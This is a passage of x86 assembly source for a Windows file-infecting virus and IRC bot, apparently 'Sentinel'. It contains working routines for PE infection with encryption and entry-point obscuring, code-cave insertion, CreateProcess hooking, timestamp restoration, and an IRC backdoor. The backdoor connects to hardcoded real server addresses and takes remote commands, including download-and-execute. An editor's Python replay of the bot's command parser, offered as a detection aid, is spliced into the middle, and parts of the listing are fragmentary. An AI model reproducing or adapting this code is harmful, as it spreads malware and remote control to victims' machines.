mov [ebp + imagebase], eax ; save imagebase
CheckForEPO:
pushad
mov [ebp + epo_opcode], 15FFh ; search for call opcode
call CREATE_EPO
or eax, eax
jnz LocateBeginOfLastSection
mov [ebp + epo_opcode], 25FFh
call CREATE_EPO
or eax, eax
jnz LocateBeginOfLastSection
popad
jmp UnmapView
LocateBeginOfLastSection:
popad
movzx ebx, word ptr [esi + 20d] ; optional header size
add ebx, 24d ; file header size
movzx eax, word ptr [esi + 6h] ; no of sections
dec eax ; (we want the last-1
mov ecx, 28h ; sectionheader)
mul ecx ; * header size
add esi, ebx ; esi = begin of last
add esi, eax ; section's header
CheckForOverLays:
mov eax, [esi + 10h] ; section phys size
add eax, [esi + 14h] ; section phys offset
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx
inc eax
mul ecx
mov ecx, [ebp + filesize]
cmp ecx, eax
ja UnmapView ; we dont infect those
mov ecx, 08h
CheckForZipSFX:
lea edi, [ebp + zip]
push ecx
push esi
mov ecx, 03h
rep cmpsb
pop esi
pop ecx
je UnmapView
inc esi
loop CheckForZipSFX
ChangeLastSectionHeaderProperties:
sub esi, 08h
or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h
NewAlignedPhysicalSize:
mov eax, [esi + 8h] ; old virt size
add eax, Leap-Start
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 3ch]
div ecx ; and align it to
inc eax ; the filealign
mul ecx
mov [esi + 10h], eax ; save it
NewAlignedVirtualSize:
mov eax, [esi + 8h] ; get old
push eax ; store it
add eax, Leap-Start
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx ; and align it to
inc eax ; the sectionalign
mul ecx
mov [esi + 8h], eax ; save new value
NewAlignedImageSize:
mov eax, dword ptr [esi + 0ch] ; get virtual offset
add eax, dword ptr [esi + 8h] ; + new virtual size
mov [ebp + imagesize], eax ; = new imagesize
NewAlignedFileSize:
mov eax, dword ptr [esi + 10h] ; get new phys size
add eax, dword ptr [esi + 14h] ; add offset of phys
mov [ebp + filesize], eax ; size = filesize
CalculateNewIp:
pop eax
push eax
add eax, dword ptr [esi + 0ch] ; + virtual offset
mov [ebp + epo_ipnew_rva], eax ; new ip
CreateEpoIp:
add eax, [ebp + imagebase]
mov [ebp + epo_ipnew_va], eax
CalculateEncryptionKey:
mov ebx, [ebp + epo_aoc_pa]
sub ebx, [ebp + epo_cs_pa]
add ebx, [ebp + epo_cs_rva]
add ebx, 04h ; ebx-> original return address
add ebx, [ebp + imagebase] ; after call = encryption key
CalculateDelta:
mov eax, [ebp + epo_ipnew_va]
sub eax, ebx
mov [ebp + delta], eax
CopyVirusDecryptorToEndOfFile:
pop eax
mov edi, eax ; virtual size
add edi, [ebp + mapaddress] ; mapaddress
add edi, [esi + 14h] ; add raw data offset
lea esi, [ebp + Start] ; copy virus
mov ecx, (RealStart - Start)
rep movsb
PrepareToEncryptAndCopy:
mov ecx, ((Leap-RealStart)/4 + 1)
cld
EncryptAndCopyVirus:
movsd
sub edi, 04h
xor dword ptr [edi], ebx
add edi, 04h
loop EncryptAndCopyVirus
SearchForCavity:
mov esi, [ebp + epo_cs_pa]
mov ecx, [ebp + cs_rawsize]
call CAVITYSEARCH
or esi, esi
jz UpdatePEHeaderWithChanges
mov eax, esi
sub eax, [ebp + epo_cs_pa]
add eax, [ebp + epo_cs_rva]
add eax, [ebp + imagebase]
mov [ebp + cavity_va], eax
WriteVirusJumpIntoCavity:
add eax, 04h
mov dword ptr [esi], eax
add esi, 04h
mov dword ptr [esi], 0524048Bh
add esi, 04h
mov eax, [ebp + delta]
mov dword ptr [esi], eax
add esi, 04h
mov word ptr [esi], 0E0FFh
SetEpo:
mov eax, [ebp + cavity_va]
mov edx, [ebp + epo_aoc_pa]
mov dword ptr [edx], eax
sub edx, 02h
mov word ptr [edx], 15FFh ; turn jmp into call
UpdatePEHeaderWithChanges:
mov esi, [ebp + mapaddress]
mov word ptr [esi + 38h], 'll' ; set infectionmark
mov esi, [ebp + PEheader]
mov eax, [ebp + imagesize]
mov [esi + 50h], eax ; set new imagesize
CalculateNewCheckSum:
cmp dword ptr [esi + 58h], 00h
je UnmapView
LoadImageHlpDll:
lea eax, [ebp + imagehlp]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
or eax, eax
jz UnmapView
mov [ebp + imagehlpaddress], eax
CalculateNewChecksum:
mov esi, [ebp + PEheader]
push dword ptr [esi + 58h]
lea eax, [ebp + buffer]
push eax
push dword ptr [ebp + filesize]
push dword ptr [ebp + mapaddress]
lea eax, [ebp + ACheckSumMappedFile]
call GETIAPI
UnmapView:
push dword ptr [ebp + mapaddress]
lea eax, [ebp + AUnmapViewOfFile]
call GETAPI
CloseMap:
push dword ptr [ebp + maphandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
CloseFile:
push dword ptr [ebp + myfinddata.fd_ftLastWriteTime]
push dword ptr [ebp + myfinddata.fd_ftLastAccessTime]
push dword ptr [ebp + myfinddata.fd_ftCreationTime]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFileTime]
call GETAPI
InfectionError:
push dword ptr [ebp + myfinddata.fd_dwFileAttributes]
lea eax, [ebp + myfinddata.fd_cFileName]
push eax
lea eax, [ebp + ASetFileAttributes]
call GETAPI
ret
INFECT_FILE endp
RESIDENT_CP proc
InterceptCP:
pushad
call GetApiDelta
GetApiDelta:
pop ebp
sub ebp, offset GetApiDelta
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_USER32_BASE_ADDRESS
call RESIDENT_CP2
call IRC_LAUNCH
popad
GetNewDelta:
call NewDelta
NewDelta:
pop eax
sub eax, offset NewDelta
RestoreApiCode:
pushad
mov edi, [eax + cp_oldapicodeaddress]
lea esi, [eax + cp_oldapicode]
mov ecx, 06h
rep movsb
popad
ReHookApi:
pushad
call GetNewDelta2
GetNewDelta2:
pop ebp
sub ebp, offset GetNewDelta2
ReturnToOriginalCaller:
db 68h
returnaddress dd 0
ret
RESIDENT_CP endp
RESIDENT_CP2 proc
CheckForEmptyCommandLine:
mov esi, dword ptr [esp + 2ch]
or esi, esi
jz Continue
ExtractFileName:
xor ecx, ecx
cmp byte ptr [esi], '"'
jne FileNameNormal
inc esi
push esi
GetFileNamePartBetweenQuotes:
cmp byte ptr [esi], '"'
je GetBetweenQuotes
inc esi
inc ecx
cmp ecx, 100h
ja FileNameEndNotFound
jmp GetFileNamePartBetweenQuotes
GetBetweenQuotes:
mov edi, esi
pop esi
sub edi, esi ; esi hold start of filename
mov ecx, edi ; ecx holds size of filename
jmp StoreFileName
FileNameNormal:
push esi
GetNormalFileName:
cmp byte ptr [esi], ' '
je FoundNormalFileName
inc esi
inc ecx
cmp ecx, 100h
ja FileNameEndNotFound
jmp GetNormalFileName
FoundNormalFileName:
mov edi, esi
pop esi
sub edi, esi ; esi hold start of filename
mov ecx, edi ; ecx holds size of filename
jmp StoreFileName
FileNameEndNotFound:
pop esi
jmp Continue
StoreFileName:
push edi
push esi
push ecx
pop ecx
pop esi
pop edi
CheckForRem:
lea esi, [ebp + filenamebuffer]
cmp word ptr [esi], 'er'
jne FindFirstFile
inc esi
cmp word ptr [esi], 'me'
je Continue
FindFirstFile:
lea eax, [ebp + myfinddata] ; win32 finddata structure
push eax
lea eax, [ebp + filenamebuffer]
push eax
lea eax, [ebp + AFindFirstFile] ; find the file
call GETAPI
cmp eax, 0FFFFFFFFh ; file was not found
je Continue
CheckFileName:
cmp byte ptr [esi], 0
je Continue
cmp dword ptr [esi], 'mmud'
je InfectThisFile
inc esi
inc ecx
cmp ecx, 100h
ja Continue
jmp CheckFileName
InfectThisFile:
mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize
mov [ebp + filesize], ecx ; save the filesize
add ecx, Leap - Start + 1000h ; filesize + virus
mov [ebp + memory], ecx ; + workspace = memory
call INFECT_FILE
Continue:
ret
RESIDENT_CP2 endp
HOOK_API proc
; IN: hookstruct:
; 00 : offset api name
; 04 : old apicodeaddress
; 08 ; offset for old apicode
; 12 ; offset for new apicode
; 16 : new apicodeaddress
FindKernelExportTable:
pushad
mov edi, [ebp + kernel32address]
add edi, dword ptr [edi + 3ch]
mov esi, dword ptr [edi + 78h]
add esi, [ebp + kernel32address]
GetNecessaryData:
mov eax, dword ptr [esi + 18h]
add eax, [ebp + kernel32address]
mov [ebp + numberofnames], eax ; save number of names
mov eax, dword ptr [esi + 1Ch] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp + addressoffunctions], eax ; function addresses
mov eax, dword ptr [esi + 20h] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp+addressofnames], eax ; pointers to names
mov eax, dword ptr [esi + 24h] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp+addressofordinals], eax ; pointers to ordinals
BeginApiAddressSearch:
mov esi, [ebp + addressofnames] ; search for
mov [ebp + AONindex], esi ; API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
HookCreateProcess:
xor ecx, ecx
OkTryAgain:
lea ebx, [ebp + hookstruct]
mov esi, dword ptr [ebx]
MatchByteNow:
cmpsb
jne NextOneNow
cmp byte ptr [esi], 0 ; did the entire string
je YesGotIt ; match ?
jmp MatchByteNow
NextOneNow:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address]
jmp OkTryAgain
YesGotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi] ; offset of address
shl eax, 2 ; of function = ordinal
mov esi, [ebp + addressoffunctions] ; * size of entry of
add esi, eax ; address table
mov edi, dword ptr [esi] ; get address
add edi, [ebp + kernel32address]
SetApiHook:
mov eax, edi
shr eax, 12d
ModifyPagePermissions:
push 20060000h
push 00000000h
push 00000001h
push eax
push 0001000dh
call dword ptr [ebp + AVxdcall0A]
SaveCreateProcessApiCode:
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 4]
mov esi, dword ptr [esi]
lea edi, [ebp + hookstruct]
mov edi, dword ptr [edi + 8]
mov ecx, 06h
rep movsb
PrepareCreateProcessApiCode:
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 12]
mov byte ptr [esi], 68h
inc esi
lea eax, [ebp + hookstruct]
mov eax, dword ptr [eax + 16]
mov eax, dword ptr [eax]
mov dword ptr [esi], eax
add esi, 04h
mov byte ptr [esi], 0c3h
ChangeCreateProcessApiCode:
lea edi, [ebp + hookstruct]
mov edi, dword ptr [edi + 4]
mov edi, dword ptr [edi]
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 12]
mov ecx, 06h
rep movsb
ApiHookError:
popad
ret
HOOK_API endp
CREATE_EPO proc
LocateCodeSectionHeader:
mov eax, [ebp + ip_original]
call FIND_SECTION
or eax, eax
jz ExitEpoRoutine
GetPointerToRawData:
mov eax, dword ptr [edi + 12d] ; eax = rva cs
mov [ebp + epo_cs_rva], eax
mov ecx, dword ptr [edi + 16d] ; raw size of code section
mov [ebp + cs_rawsize], ecx
mov edx, dword ptr [edi + 20d] ; RVA to raw data of code section
add edx, [ebp + mapaddress]
mov [ebp + epo_cs_pa], edx
mov esi, edx
ScanForOpcode:
lodsw
dec esi
FoundOpcode:
dec ecx
push esi
push ecx
inc esi
ExamineAddress:
mov [ebp + epo_aoc_pa], esi ; address of call
mov eax, dword ptr [esi]
mov [ebp + epo_awaa_va], eax ; address where api address
;pushad
;call MSG_BEEP
;popad
GetRVAImportTable:
mov esi, [ebp + PEheader]
mov eax, [esi + 80h] ; rva of import table
call FIND_SECTION
or eax, eax
jz NotFound
CompareAddressToImportAddress:
mov esi, [ebp + epo_awaa_va]
cmp edx, esi
jb CheckNotAbove
jmp NotFound
CheckNotAbove:
add edx, ecx
cmp edx, esi
ja FoundGoodInsertionPoint
NotFound:
pop ecx
pop esi
jmp ScanForOpcode
FoundGoodInsertionPoint:
mov eax, 0ah
call GET_RANDOM_NUMBER_WITHIN
cmp eax, 3h
ja NotFound
pop ecx
pop esi
mov eax, 01h
ExitEpoRoutine:
ret
CREATE_EPO endp
FIND_USER32_BASE_ADDRESS proc
GetUser32Base:
lea eax, [ebp + user32]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
mov [ebp + user32address], eax
ret
FIND_USER32_BASE_ADDRESS endp
FIND_WSOCK32_BASE_ADDRESS proc
LoadWsock32:
lea eax, [ebp + wsock32] ; not found, then
push eax ; load the dll
lea eax, [ebp + ALoadLibrary] ; first
call GETAPI
mov [ebp + wsock32address], eax
ret
FIND_WSOCK32_BASE_ADDRESS endp
FIND_SECTION proc
FindFirstSectionHeader:
mov esi, [ebp + mapaddress]
add esi, dword ptr [esi + 3ch] ; esi=offset peheader
movzx ecx, word ptr [esi + 06h] ; ecx = nr. of sections
movzx edi, word ptr [esi + 20d] ; optional header size
add esi, 24d ; file header size
add edi, esi
FindCorrespondingSection:
push eax
mov edx, dword ptr [edi + 12d] ; section RVA
sub eax, edx
cmp eax, dword ptr [edi + 08d] ; section size
jb SectionFound
NotThisSection:
pop eax
add edi, 40d
loop FindCorrespondingSection
EndSectionSearch:
xor eax, eax
ret
SectionFound:
pop eax
mov edx, dword ptr [edi + 12d]
add edx, [ebp + imagebase]
mov ecx, dword ptr [edi + 08d]
ret
FIND_SECTION endp
GET_RANDOM_NUMBER proc
GET_RANDOM_NUMBER endp
GET_RANDOM_NUMBER_WITHIN proc
push ebx
call GET_RANDOM_NUMBER
xchg eax,ebx ; EBX = number in range
xor eax,eax ; Zero EAX
xchg eax,edx ; EDX = 32-bit random number
div ebx ; EAX = random number within range
pop ebx
xchg eax, edx
ret
GET_RANDOM_NUMBER_WITHIN endp
CAVITYSEARCH proc
;-----------------------------------------------------------------------------
; Cavity search engine by Benny and Darkman of 29A
;
; Calling parameters:
; ECX = size of search area
; ESI = pointer to search area
;
; Return parameters:
; ESI = pointer to cave
CSE:
pushad
mov ebp, 14d ; EBP = size of cave wanted
lodsb ; AL = byte within search area
reset_cavity_loop:
xchg eax,ebx ; BL = " " " "
xor edx,edx ; Zero EDX
dec ecx ; Decrease counter
cmp ecx,ebp ; Unsearched search area large enough?
jb no_cave_found ; Below? Jump to no_cave_found
find_cave_loop:
lodsb ; AL = byte within search area
cmp al,bl ; Current byte equal to previous byte?
jne reset_cavity_loop ; Not equal? Jump to reset_cavity_loop
inc edx ; Increase number of bytes found in
; cave
cmp edx,ebp ; Found a cave large enough?
jne find_cave_loop ; Not equal? Jump to find_cave_loop
sub esi,ebp ; ESI = pointer to cave
jmp exit_cave
no_cave_found:
xor esi, esi
exit_cave:
mov [esp + 4],esi
popad
ret
;-----------------------------------------------------------------------------
CAVITYSEARCH endp
names dd 30d
name1 db 'pion',0
name2 db 'sarge',0
name3 db 'blink',0
name4 db 'midge',0
name5 db 'xaero',0
name6 db 'void',0
name7 db 'vivid',0
name8 db 'xeon',0
name9 db 'n0bs',0
name10 db 'helios',0
name11 db 'phobos',0
name12 db 'flux',0
name13 db 'hypno',0
name14 db 'bond',0
name15 db 'chaos',0
name16 db 'blup',0
name17 db 'sntnl',0
name18 db 'fire',0
name19 db 'water',0
name20 db 'earth',0
name21 db 'heart',0
name22 db 'stone',0
name23 db 'light',0
name24 db 'love',0
name25 db 'silver',0
name26 db 'surfer',0
name27 db 'panic',0
name28 db 'm00dy',0
name29 db 'texas',0
name30 db 'snow',0
name31 db 'beta',0
servers dd 04d
server1 db "195.112.4.25",0
server2 db "195.159.135.99",0
server3 db "195.121.6.196",0
server4 db "154.11.89.164",0
server5 db "205.188.149.3",0
port1 dd 7000d
port2 dd 6660d
port3 dd 6660d
port4 dd 6661d
port5 dd 6667d
GET_ITEM_FROM_LIST proc
GetItemFromList:
push edi
push esi
call GET_RANDOM_NUMBER_WITHIN
mov ecx, eax
pop esi
push eax
or ecx, ecx
jz GetSizeOfItem
GetPositionOfItem:
push ecx
call GET_STRING_SIZE
add esi, ecx
inc esi
pop ecx
loop GetPositionOfItem
GetSizeOfItem:
call GET_STRING_SIZE
pop eax
pop edi
ret
GET_ITEM_FROM_LIST endp
IRC_LAUNCH proc
IRCLaunch:
cmp [ebp + ircstatus], 00h
je CreateIRCThread
ret
CreateIRCThread:
lea eax, [ebp + ircthreadid]
push eax
push 00h
push 01h
lea eax, [ebp + IRC_THREAD]
push eax
push 00h
push 00h
lea eax, [ebp + ACreateThread]
call GETAPI
mov [ebp + ircstatus], 01h
ret
IRC_LAUNCH endp
IrcThreadEntryPoint:
pushad
call GetIrcDelta
GetIrcDelta:
pop ebp
sub ebp, offset GetIrcDelta
GetWSock32Base:
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_WSOCK32_BASE_ADDRESS
LoadWinInetDll:
lea eax, [ebp + wininet]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
or eax, eax
jz UserIsOffline
FindConnectionApiAddress:
lea ebx, [ebp + AInternetGetConnectedState]
push ebx
push eax
call [ebp + AGetProcAddressA]
or eax, eax
jz UserIsOffline
CheckConnection:
push 00h
lea ebx, [ebp + buffer]
push ebx
call eax
or eax, eax
jnz UserIsOnline
UserIsOffline:
push 10000h
lea eax, [ebp + ASleep]
call GETAPI
jmp LoadWinInetDll
UserIsOnline:
lea eax, [ebp + mywsadata]
push eax
push 101h
lea eax, [ebp + AWSAStartup]
call GETWAPI
OpenSocket:
push 00h
push SOCK_STREAM
push AF_INET
lea eax, [ebp + Asocket]
call GETWAPI
mov [ebp + socketh], eax
GetSocketValues:
mov [ebp + mysocket.sin_family], AF_INET
mov eax, [ebp + servers]
lea esi, [ebp + server1]
call GET_ITEM_FROM_LIST
push esi
push ecx
GetPort:
lea esi, [ebp + port1]
mov ecx, 04
mul ecx
add esi, eax
mov edx, dword ptr [esi]
push edx
lea eax, [ebp + Ahtons]
call GETWAPI
mov [ebp + mysocket.sin_port], ax
pop ecx
lea eax, [ebp + Ainet_addr]
call GETWAPI
mov [ebp + mysocket.sin_addr], eax
Connect:
push 10h
lea eax, [ebp + mysocket]
push eax
push [ebp + socketh]
lea eax, [ebp + Aconnect]
call GETWAPI
test eax, eax
jnz Connect
LogonToIrcServer:
call LOGON
DoTheLoop:
call IRC_RECEIVE
or eax, eax
jz CloseSocket
jmp DoTheLoop
CloseSocket:
push [ebp + socketh]
lea eax, [ebp + Aclosesocket]
call GETWAPI
WSACleanUp:
lea eax, [ebp + AWSACleanup]
call GETWAPI
ExitThread:
popad
ret
IRC_THREAD endp
call IRC_RECEIVE
SendNick:
lea edi, [ebp + offset buffer]
lea esi, [ebp + offset nick]
mov ecx, 05h
rep movsb
lea esi, [ebp + name1]
mov eax, [ebp + names]
call GET_ITEM_FROM_LIST
rep movsb
mov ebx, 10d
call GET_RANDOM_NUMBER_WITHIN
add eax, 48d
mov byte ptr [edi], al
inc edi
mov ebx, 10d
call GET_RANDOM_NUMBER_WITHIN
add eax, 48d
mov byte ptr [edi], al
inc edi
lea esi, [ebp + crlf]
mov ecx, 03h
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
call IRC_RECEIVE
SendUser:
lea edi, [ebp + buffer]
lea esi, [ebp + user1]
mov ecx, 05d
rep movsb
call CREATE_RANDOM_NAME
lea esi, [ebp + user2]
mov ecx, 18d
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
call IRC_RECEIVE
call IRC_RECEIVE
SendJoin:
lea esi, [ebp + join]
mov ecx, 13d
call IRC_SEND
PostVersionMessage:
call .PostVersion
LogonDone:
ret
LOGON endp
IRC_RECEIVE proc
push 00h
push 400h
lea eax, [ebp + buffer]
push eax
push [ebp + socketh]
lea eax, [ebp + ARecv]
call GETWAPI
mov [ebp + nrbytes], eax
call IRC_SCANBUFFER
ret
IRC_RECEIVE endp
IRC_SEND proc
push 00h
push ecx
push esi
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
ret
IRC_SEND endp
.PostVersion:
lea edi, [ebp + buffer]
lea esi, [ebp + post]
mov ecx, 16d
rep movsb
lea esi, [ebp + post_vers]
mov ecx, 5d
rep movsb
lea esi, [ebp + version]
mov ecx, 4d
rep movsb
lea esi, [ebp + crlf]
mov ecx, 03d
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
ret
.RespondPing:
lea edi, [ebp + buffer]
lea esi, [ebp + pong]
mov ecx, 04h
rep movsb
mov ecx, [ebp + nrbytes]
lea esi, [ebp + buffer]
call IRC_SEND
.RespondPing_End:
ret
IRC_SCANBUFFER proc
ScanDaBuffer:
mov ecx, [ebp + nrbytes]
lea esi, [ebp + buffer]
.PingPongMessage:
cmp dword ptr [esi], 'GNIP'
jne GetReplyNick
call .RespondPing
jmp EndLoop
GetReplyNick:
jecxz EndLoop
inc esi
dec ecx
cmp byte ptr [esi], '!'
je ExtractReplyNick
cmp byte ptr [esi], ':'
je EndLoop
jmp GetReplyNick
ExtractReplyNick:
push esi
push ecx
mov ecx, esi
lea esi, [ebp + buffer]
sub ecx, esi
dec ecx
inc esi
lea edi, [ebp + replynick]
rep movsb
mov byte ptr [edi], 00h
pop ecx
pop esi
ScanLoop:
jecxz EndLoop
cmp dword ptr [esi], 'VIRP'
je SearchTextStart
inc esi
dec ecx
jmp ScanLoop
SearchTextStart:
jecxz EndLoop
cmp byte ptr [esi], ':'
je .CommandMessage
inc esi
dec ecx
jmp SearchTextStart
.CommandMessage:
inc esi
dec ecx
cmp dword ptr [esi], 's54p'
jne EndLoop
GetText:
add esi, 5
sub ecx, 5
cmp byte ptr [esi], '/'
jne EndLoop
CheckIncomingCommandMessage:
inc esi
dec ecx
cmp dword ptr [esi], 'kc1n'
je CreateRandomNick
cmp dword ptr [esi], 't1uq'
je QuitIrc
cmp dword ptr [esi], 'c3xe'
je LaunchInstaller
cmp dword ptr [esi], 't4ts'
je InstallerStatus
call IRC_SEND
jmp EndLoop
CreateRandomNick:
lea edi, [ebp + mynick]
call CREATE_RANDOM_NAME
mov byte ptr [edi], 00h
lea edi, [ebp + buffer]
mov dword ptr [edi], 'KCIN'
add edi, 04h
mov byte ptr [edi], ' '
inc edi
lea esi, [ebp + mynick]
call GET_STRING_SIZE
rep movsb
lea esi, [ebp + crlf]
mov ecx, 03h
rep movsb
lea esi, [ebp + buffer]
call GET_STRING_SIZE
call IRC_SEND
jmp EndLoop
QuitIrc:
lea esi, [ebp + quit]
mov ecx, 06h
call IRC_SEND
xor eax, eax
jmp EndLoop
LaunchInstaller:
call INSTALLER_LAUNCH
jmp EndLoop
InstallerStatus:
call INSTALLER_STATUS
EndLoop:
ret
IRC_SCANBUFFER endp
version db "0101",0
post db "PRIVMSG #sntnl :",0
post_vers db "vers ",0
mynick db 5h dup(0)
replynick db 5h dup(0)
nrbytes dd 0
ircstatus dd 0
ircthreadid dd 0
wsock32 db "WSOCK32.dll",0
wininet db "WININET.dll",0
ASend db "send",0
ARecv db "recv",0
AWSAGetLastError db "WSAGetLastError",0
AWSAGetLastErrorA dd 0
AInternetGetConnectedState db "InternetGetConnectedState",0
ACreateThread db "CreateThread",0
AWSAStartup db "WSAStartup",0
AWSACleanup db "WSACleanup",0
Asocket db "socket",0
Aconnect db "connect",0
Aclosesocket db "closesocket",0
Ahtons db "htons",0
Ainet_addr db "inet_addr",0
AGetTickCount db "GetTickCount",0
AGetLastError db "GetLastError",0
ASleep db "Sleep",0
random_number dd 01234567h
ipaddress db "212.43.217.183",0
; if the bot does not appear online in #sentinel, try using a different
; server ip-address.
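An added example (this editor's Python, not part of the Sentinel listing): IRC_SCANBUFFER above is the whole command grammar of the bot, and it is easier to reason about in a high-level replay than in the dword compares. The code below mirrors the scan byte for byte (PING at the start of the buffer, the '!'-terminated sender nick, "PRIV" then ':' then the "p45s" prefix and the four command words, the exe3 "[server][get command]" argument syntax from INSTALLER_LAUNCH, and the fact that an unknown word is sent straight back to the server), and runs it over a few constructed IRC lines to show what a Sentinel bot would act on. Assumptions, marked in the code: the fifth byte of the "p45s?" token and the contents of the 6-byte quit string are not recoverable from the listing, the sample lines are constructed, and the beacon pattern is simply post + post_vers + version from the data area.

```python
import random
import string
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# The scanner compares little-endian dwords ('kc1n', 't1uq', 'c3xe', 't4ts'),
# i.e. the ASCII words n1ck, qu1t, exe3, st4t. "p45s" is the prefix it tests first.
REPLYNICK_SIZE = 5                         # replynick db 5h dup(0)
BEACON = b"PRIVMSG #sntnl :vers 0101"      # post + post_vers + version strings

@dataclass
class Action:
    kind: str                  # pong | ignore | n1ck | qu1t | exe3 | st4t | echo
    reply_nick: bytes = b""    # what ExtractReplyNick copies out
    send: bytes = b""          # bytes the bot would put on the wire
    server: bytes = b""        # exe3 argument 1 (installer_server)
    get_cmd: bytes = b""       # exe3 argument 2 (installer_get)
    notes: List[str] = field(default_factory=list)

def random_nick(rng: Optional[random.Random] = None) -> bytes:
    """CREATE_RANDOM_NAME: five letters, each 'a' + random(26)."""
    rng = rng or random.Random()
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(5)).encode()

def parse_exe3(rest: bytes) -> Optional[Tuple[bytes, bytes]]:
    """INSTALLER_LAUNCH: skip 5 bytes past the command word, expect '[server]'
    right there, then '[get command]' anywhere after it."""
    p = rest[5:]
    if p[:1] != b"[":
        return None
    end1 = p.find(b"]", 1)
    start2 = p.find(b"[", end1) if end1 >= 0 else -1
    end2 = p.find(b"]", start2 + 1) if start2 >= 0 else -1
    if end2 < 0:
        return None
    return p[1:end1], p[start2 + 1:end2]

def scan_buffer(buf: bytes, rng: Optional[random.Random] = None) -> Action:
    """Mirror IRC_SCANBUFFER on one received buffer."""
    if buf[:4] == b"PING":
        # .RespondPing overwrites the first four bytes and sends the whole buffer back
        return Action("pong", send=b"PONG" + buf[4:])
    # GetReplyNick: '!' ends the sender nick; a ':' seen first abandons the scan
    i = 1
    while i < len(buf) and buf[i] not in b"!:":
        i += 1
    if i >= len(buf) or buf[i] == ord(":"):
        return Action("ignore")
    act = Action("ignore", reply_nick=buf[1:i])
    if len(act.reply_nick) > REPLYNICK_SIZE:
        act.notes.append("nick longer than the 5-byte replynick buffer (rep movsb is unbounded)")
    j = buf.find(b"PRIV", i)                      # ScanLoop
    k = buf.find(b":", j) if j >= 0 else -1       # SearchTextStart
    if k < 0:
        return act
    text = buf[k + 1:]
    # Assumption: the 5th byte of the "p45s?" token is not recoverable from the listing
    if text[:4] != b"p45s" or text[5:6] != b"/":
        return act
    rest = text[6:]
    word = rest[:4]
    if word == b"n1ck":
        act.kind, act.send = "n1ck", b"NICK " + random_nick(rng) + b"\r\n"
    elif word == b"qu1t":
        act.kind = "qu1t"
        act.notes.append("sends the 6-byte quit string (its contents are not in the listing)")
    elif word == b"exe3":
        act.kind = "exe3"
        args = parse_exe3(rest)
        if args:
            act.server, act.get_cmd = args
    elif word == b"st4t":
        act.kind = "st4t"                    # replies with one of installer_stat00..04
    else:
        act.kind, act.send = "echo", rest    # unknown word: remaining bytes go back to the server
    return act

def detect(lines: List[bytes]) -> List[Tuple[int, str, bytes]]:
    """Run the grammar over captured IRC lines and report what a Sentinel bot would act on."""
    out = []
    for n, line in enumerate(lines, 1):
        if BEACON in line:
            out.append((n, "beacon", BEACON))
            continue
        a = scan_buffer(line)
        if a.kind in ("n1ck", "qu1t", "exe3", "st4t", "echo"):
            out.append((n, a.kind, a.server + b" " + a.get_cmd if a.kind == "exe3" else a.send))
    return out

# Constructed sample traffic (not a real capture); 203.0.113.10 is a documentation address.
SAMPLE = [
    b"PING :irc.example.test\r\n",
    b"PRIVMSG #sntnl :vers 0101\r\n",
    b":ops!u@h PRIVMSG #sntnl :p45s?/n1ck\r\n",
    b":ops!u@h PRIVMSG #sntnl :p45s?/exe3 [203.0.113.10][GET /sock32.exe HTTP/1.0]\r\n",
    b":ops!u@h PRIVMSG #sntnl :hello bot\r\n",
    b":operatorx!u@h PRIVMSG #sntnl :p45s?/zzzz anything\r\n",
]

if __name__ == "__main__":
    for n, kind, detail in detect(SAMPLE):
        print(n, kind, detail)
```

Two things the replay makes obvious that the listing hides: a server or user whose nick is longer than five characters overruns replynick (and mynick gets a sixth, terminating byte from CreateRandomNick as well), and any message that reaches the command dispatcher with a word the bot does not know is echoed back verbatim, which is a handy fingerprint for an IRC operator who wants to confirm a suspect client.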
CREATE_RANDOM_NAME proc
call GetRandomChar
call GetRandomChar
call GetRandomChar
call GetRandomChar
call GetRandomChar
ret
GetRandomChar:
mov eax, 26d
call GET_RANDOM_NUMBER_WITHIN
add eax, 97d
mov byte ptr [edi], al
inc edi
ret
CREATE_RANDOM_NAME endp
GET_STRING_SIZE proc
GetStringSize:
xor ecx, ecx
SearchEndOfString:
cmp byte ptr [esi + ecx], 0h
je StringSizeFound
inc ecx
jmp SearchEndOfString
StringSizeFound:
ret
GET_STRING_SIZE endp
INSTALLER_LAUNCH proc
LaunchTheInstaller:
add esi, 05h
sub ecx, 05h
GetServerValue:
cmp byte ptr [esi], '['
jne ExitInstallerLaunch
inc esi
FoundServerValueStart:
mov edi, esi
xor edx, edx
GetServerLoop:
cmp byte ptr [esi], ']'
je StoreServerValue
inc esi
inc edx
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetServerLoop
StoreServerValue:
mov esi, edi
push ecx
lea edi, [ebp + installer_server]
mov ecx, edx
rep movsb
pop ecx
GetGetCommand:
cmp byte ptr [esi], '['
je FilterGetCommand
inc esi
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetGetCommand
FilterGetCommand:
inc esi
mov edi, esi
xor edx, edx
